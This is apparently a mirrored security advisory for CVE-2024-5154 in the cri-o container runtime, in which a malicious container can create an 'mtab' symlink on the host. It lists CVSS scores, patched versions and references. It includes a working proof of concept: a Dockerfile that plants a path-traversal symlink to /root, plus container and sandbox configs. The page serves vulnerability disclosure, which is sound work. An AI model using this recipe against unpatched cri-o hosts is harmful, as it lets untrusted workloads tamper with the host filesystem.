GoogleOSV:GHSA-J9HF-98C3-WRM8malicious container creates symlink "mtab" on the host External
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
16.6%
Impact
A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.
A workload built from this Dockerfile:
FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc
FROM scratch
COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .
and this container config:
{
"metadata": {
"name": "busybox"
},
"image":{
"image": "localhost/test"
},
"command": [
"/bin/true"
],
"linux": {
}
}
and this sandbox config
{
"metadata": {
"name": "test-sandbox",
"namespace": "default",
"attempt": 1,
"uid": "edishd83djaideaduwk28bcsb"
},
"linux": {
"security_context": {
"namespace_options": {
"network": 2
}
}
}
}
will create a file on host /host/mtab
Patches
1.30.1, 1.29.5, 1.28.7
Workarounds
Unfortunately not
References
Are there any links users can visit to find out more?
References
access.redhat.com/errata/RHSA-2024:3676
access.redhat.com/errata/RHSA-2024:3700
access.redhat.com/errata/RHSA-2024:4008
access.redhat.com/errata/RHSA-2024:4486
access.redhat.com/security/cve/CVE-2024-5154
bugzilla.redhat.com/show_bug.cgi?id=2280190
github.com/cri-o/cri-o
github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8
nvd.nist.gov/vuln/detail/CVE-2024-5154
pkg.go.dev/vuln/GO-2024-2919
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
16.6%